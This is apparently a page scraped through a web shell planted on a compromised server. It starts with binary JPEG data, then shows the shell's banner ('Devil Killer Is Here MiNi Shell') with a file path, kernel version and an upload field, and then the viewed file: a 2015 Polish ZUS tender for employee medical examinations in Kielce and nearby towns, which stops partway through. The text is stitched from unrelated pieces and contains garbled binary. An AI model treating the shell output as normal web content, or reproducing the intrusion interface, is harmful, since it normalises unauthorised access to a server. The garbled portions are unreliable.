JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150403/47539-N-2015.html

<p class="kh_header"><b>Kielce: Wykonywanie badań profilaktycznych wstępnych, okresowych i kontrolnych dla pracowników Oddziału ZUS w Kielcach / Inspektoratu ZUS w Końskich / Inspektoratu ZUS w Skarżysku Kamiennej/ Inspektoratu ZUS w Opatowie/ Inspektoratu ZUS w Ostrowcu Św. / Inspektoratu ZUS w Starachowicach oraz przeprowadzenie badań mammograficznych, USG piersi i badań PSA dla pracowników Oddziału ZUS w Kielcach i jego terenowych jednostek organizacyjnych.</b><br>
<b>Numer ogłoszenia: 47539 - 2015; data zamieszczenia: 03.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Kielcach , ul. Piotrkowska 27, 25-510 Kielce, woj. świętokrzyskie, tel. 041 3677100, faks 041 3677391.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl/zampub</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie badań profilaktycznych wstępnych, okresowych i kontrolnych dla pracowników Oddziału ZUS w Kielcach / Inspektoratu ZUS w Końskich / Inspektoratu ZUS w Skarżysku Kamiennej/ Inspektoratu ZUS w Opatowie/ Inspektoratu ZUS w Ostrowcu Św. / Inspektoratu ZUS w Starachowicach oraz przeprowadzenie badań mammograficznych, USG piersi i badań PSA dla pracowników Oddziału ZUS w Kielcach i jego terenowych jednostek organizacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia:
Przedmiot zamówienia obejmuje wykonywanie badań profilaktycznych wstępnych, okresowych i kontrolnych dla pracowników Oddziału ZUS w Kielcach / Inspektoratu ZUS w Końskich / Inspektoratu ZUS w Skarżysku Kamiennej/ Inspektoratu ZUS w Opatowie/ Inspektoratu ZUS w Ostrowcu Św. / Inspektoratu ZUS w Starachowicach oraz przeprowadzenie badań mammograficznych, USG piersi i badań PSA dla pracowników Oddziału ZUS w Kielcach i jego terenowych jednostek organizacyjnych.

Wielkość zamówienia: 
Postępowanie o wartości poniżej 134.000 Euro..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje obowiązku wnoszenia wadium przez wykonawców ubiegających się o udzielenie zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy uzyskali stosowny wpis do rejestru podmiotów wykonujących działalność leczniczą zgodnie z treścią ustawy o działalności leczniczej z dnia 15 kwietnia 2011r. (Dz.U. z 2013r., poz. 217 ze zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Brak dodatkowych wymagań w wyżej wymienionym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują placówką medyczną wyposażoną w niezbędny sprzęt medyczny do wykonywania badań profilaktycznych wstępnych, okresowych i kontrolnych oraz badań okulistycznych, badań otolaryngologicznych i neurologicznych, badań mammograficznych i USG piersi, badań PSA - w zależności od części zamówienia do której przystąpi Wykonawca - czynną w dniach i godzinach umożliwiających wykonanie usługi zgodnie z opisem przedmiotu zamówienia oraz zlokalizowaną w granicach administracyjnych miasta:
a)	Kielce - przystępując do części I  zamówienia,
b)	Końskich - przystępując do części II zamówienia,
c)	Skarżysko Kamienna - przystępując do części III zamówienia,
d)	Opatów - przystępując do części IV zamówienia,
e)	Ostrowiec Świętokrzyski - przystępując do części V zamówienia,
f)	Starachowicach - przystępując do części VI zamówienia,
g)	Kielce - przystępując do części VII zamówienia,
h)	Kielce - przystępując do części VIII zamówienia,
Badania diagnostyczne/okulistyczne/zdjęcia RTG/ mammograficzne i USG piersi winny być wykonywane na terenie jednego budynku lub kompleksu budynków (szpital, przychodnia), z zastrzeżeniem, iż budynki w których będą się odbywać badania nie mogą być oddalone od siebie o więcej niż 1000m</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują personelem medycznym, który posiada specjalizację: 
a)	w dziedzinie medycyny pracy zgodnie z Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz.U. z 1996r. Nr 69 poz. 332 ze zm.),
b)	w zakresie wszelkich badań specjalistycznych objętych przedmiotem zamówienia lub wynikających z aktualnych potrzeb w zakresie możliwości wydania orzeczenia lekarskiego o braku lub istnieniu przeciwwskazań zdrowotnych do pracy na danym stanowisku w szczególności w dziedzinie okulistyki, laryngologii i neurologii</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Brak dodatkowych wymagań w wyżej wymienionym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony i podpisany formularz ofertowy ,
2. wypełniony i podpisany formularz cenowy, 
3. oświadczenie Wykonawcy o części zamówienia, której wykonanie zamierza powierzyć podwykonawcy,
4. w przypadku gdy wykonawcę reprezentuje pełnomocnik - pełnomocnictwo określające zakres umocowania pełnomocnika,
5. w przypadku oferty składanej przez wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia (w szczególności członków konsorcjum oraz wspólników spółki cywilnej) (art. 23 ust. 1 i ust. 2 u.p.z.p.) - aktualny dokument potwierdzający ustanowienie pełnomocnika do reprezentowania w/w wykonawców 
w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy lub umowę regulującą współpracę i zasady reprezentacji podmiotów występujących wspólnie w szczególności umowę spółki cywilnej.
8) jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami niezbędnymi w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany i uzupełnienia niniejszej umowy przewidziane w Specyfikacji Istotnych Warunków Zamówienia przedmiotowego zamówienia wymagają formy pisemnej pod rygorem nieważności.
2.Zmiana umowy dokonana z naruszeniem przepisu art. 144 ust.1 ustawy Prawo zamówień publicznych jest nieważna.  
3. Niedopuszczalna jest, pod rygorem nieważności, zmiana postanowień niniejszej umowy, 
za wyjątkiem okoliczności wskazanych w Specyfikacji Istotnych Warunków Zamówienia albo w ogłoszeniu). Zmiana taka wymaga każdorazowo zgody Zamawiającego i Wykonawcy i może być dokonana wyłącznie w formie pisemnego aneksu podpisanego przez obie strony. Dotyczy to w szczególności następujących sytuacji:
1) Zmiany wynikające ze zmiany sposobu spełnienia świadczenia: 
a) zmiana miejsca i/lub terminu i/lub godzin wykonywania profilaktycznych badań 
lekarskich w ramach danego miasta pod warunkiem że nie zwiększy to wynagrodzenia należnego od Zamawiającego. 
2) Zmiany wynikające ze zmiany przepisów prawa:  
a) Konieczność realizowania jeszcze innych badań niż to wynika z zawartej umowy 
ze względu na wymogi wprowadzone zmianą przepisów prawa w tym zakresie. 
W takim przypadku Zamawiający zapłaci za niezbędne badania dodatkowe do których obligują nowe przepisy wg ceny lub cen nie wyższych niż oferowane przez Wykonawcę innym podmiotom. Badania takie muszą być przeprowadzane przez specjalistów posiadających odpowiedni stopień specjalizacji.  
b) Wysokość wynagrodzenia Wykonawcy, o którym mowa w § 5 ust. 9 może ulec zmianie z zastrzeżeniem postanowień ust. 3 pkt 2) lit. c) i d), w przypadku zmiany:
-stawki podatku od towarów i usług (VAT),
-wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. Nr 200, poz. 1679, z 2004r. Nr 240, poz. 2407 oraz z 2005r. Nr 157, poz. 1314),
-zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania przedmiotu umowy przez Wykonawcę.
c) W przypadku zmiany przepisów, o których mowa w ust. 3 pkt 2) lit. b), skutkujących istotną zmianą kosztów wykonania przedmiotu umowy przez Wykonawcę, każda ze Stron umowy, w terminie 30 dni od wejścia w życie przepisów wprowadzających te zmiany, może wystąpić do drugiej Strony o przeprowadzenie negocjacji w sprawie 
dokonania odpowiedniej zmiany wysokości wynagrodzenia (zmniejszenia lub zwiększenia). 
d) Podstawą do przeprowadzenia negocjacji, o których mowa w ust. 3 pkt 2) lit. c), będzie przedstawiana każdorazowo Zamawiającemu kalkulacja kosztów Wykonawcy, uwzględniająca wpływ wejścia w życie przepisów dokonujących te zmiany na koszty wykonania przedmiotu umowy przez Wykonawcę. Wykonawca będzie zobowiązany 
do przedstawienia stosownej kalkulacji na pisemne żądanie Zamawiającego w terminie 5 dni od otrzymania żądania.
e) koszty ewentualnych zmian wynagrodzenia, o którym mowa w ust. 3 pkt 2) lit. b) -d) będą obciążały w równym stopniu każdą ze Stron umowy. 
3) Pozostałe zmiany 
a) wystąpienie jednokrotnie lub wielokrotnie siły wyższej np. klęski żywiołowej uniemożliwiającej prawidłowe wykonanie lub wykonanie w terminie przedmiotu umowy zgodnie z ofertą. Wówczas termin wykonania  przedmiotu zamówienia można przesunąć o czas niezbędny do należytego jego wykonania, nie dłużej jednak niż o okres trwania tych okoliczności. W takim przypadku Wykonawca musi na piśmie przedstawić i udowodnić zaistnienie powyższych okoliczności. 
b) Konieczność wprowadzenia zmiany, która jest korzystna dla Zamawiającego.
Wprowadzenie takiej zmiany jest możliwe pod warunkiem, że gdyby hipotetycznie 
dokonać jej wprowadzenia przed terminem składania ofert nie miałoby to wpływu na krąg Wykonawców ani też na wybór oferty najkorzystniejszej w danej części.
c) Waloryzacja cen jednostkowych raz w roku począwszy od 2017 roku w oparciu 
o średnioroczny wskaźnik cen towarów i usług konsumpcyjnych ogółem, za rok 
poprzedni ogłaszanym przez Prezesa GUS na podstawie przepisów ustawy 
o emeryturach i rentach z FUS i po jego ogłoszeniu w Monitorze Polskim. Podstawą zmiany stawki będzie aneks do umowy.
4. Nie stanowi zmiany umowy w szczególności:
1) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego na który jest regulowane wynagrodzenie); 
2) zmiana danych teleadresowych;  
3) zmiana osób upoważnionych do kontaktu w zakresie realizacji umowy, o których mowa w § 11.
4) utrata mocy lub zmiana aktów prawnych przywołanych w treści umowy, do których 
stosować należy przepisy obowiązujące w danym czasie.
5. Zmiany, o których mowa w ust. 4 dokonywane są w drodze jednostronnego pisemnego 
oświadczenia Strony w taki sposób aby komunikowana treść dotarła do drugiej Strony. 
Oświadczenie takie wywoła skutek od dnia doręczenia go drugiej Stronie w taki sposób aby mogła się z tym zapoznać. 
6. Strony zobowiązane są do wzajemnego informowania o wszelkich zmianach adresów, 
z zastrzeżeniem, że jeżeli którakolwiek ze Stron nie powiadomi drugiej Strony o zmianie adresu i z tej przyczyny nie dokona odbioru korespondencji, wszelkie powiadomienia wysłane na ostatnio podany adres, będą uważane za prawidłowo doręczone.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w formie papierowej w pokoju 421 przy ul. Kolberga 2a w Kielcach, lub pocztą, po przesłaniu pisemnego zapotrzebowania na adres Zamawiającego lub pod nr tel./faksu 41 344-50-7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2015 godzina 10:00, miejsce: Zakład Ubezpieczeń Społecznych
Wydział Administracyjno - Gospodarczy
Oddział w Kielcach 
ul. Piotrkowska 27
25-510 Kielce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonywanie badań profilaktycznych wstępnych, okresowych i kontrolnych, badań otolaryngologicznych i neurologicznych oraz badań okulistycznych dla pracowników O/ZUS w Kielcach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonywanie badań profilaktycznych wstępnych, okresowych i kontrolnych, badań otolaryngologicznych i neurologicznych oraz badań okulistycznych dla pracowników O/ZUS w Kielcach (w okresie od 01.01.2016r. do 31.12.2017r.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.80.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Badania dodatkowe gratis - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonywanie badań profilaktycznych okresowych, badań otolaryngologicznych i neurologicznych dla pracowników Inspektoratu ZUS w Końskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie badań profilaktycznych okresowych, badań otolaryngologicznych i neurologicznych dla pracowników Inspektoratu ZUS w Końskich (w okresie od 01.05.2015r. do 31.12.2016r.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Badania dodatkowe gratis - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonywanie badań profilaktycznych okresowych dla pracowników Inspektoratu ZUS w Skarżysku Kamiennej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie badań profilaktycznych okresowych dla pracowników Inspektoratu ZUS w Skarżysku Kamiennej (w okresie od 01.08.2015r. do 30.09.2015r.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Badania dodatkowe gratis - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonywanie badań profilaktycznych okresowych, badań otolaryngologicznych i neurologicznych dla pracowników Inspektoratu ZUS w Opatowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie badań profilaktycznych okresowych, badań otolaryngologicznych i neurologicznych dla pracowników Inspektoratu ZUS w Opatowie (w okresie od 01.01.2016r. do 31.12.2017r.),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Badania dodatkowe gratis - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonywanie badań profilaktycznych okresowych, badań otolaryngologicznych i neurologicznych dla pracowników Inspektoratu ZUS w Ostrowcu Św..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie badań profilaktycznych okresowych, badań otolaryngologicznych i neurologicznych dla pracowników Inspektoratu ZUS w Ostrowcu Św. (w okresie od 01.01.2016r. do 31.12.2017r.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Badania dodatkowe gratis - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonywanie badań profilaktycznych okresowych, badań otolaryngologicznych i neurologicznych dla pracowników Inspektoratu ZUS w Starachowicach.</p>
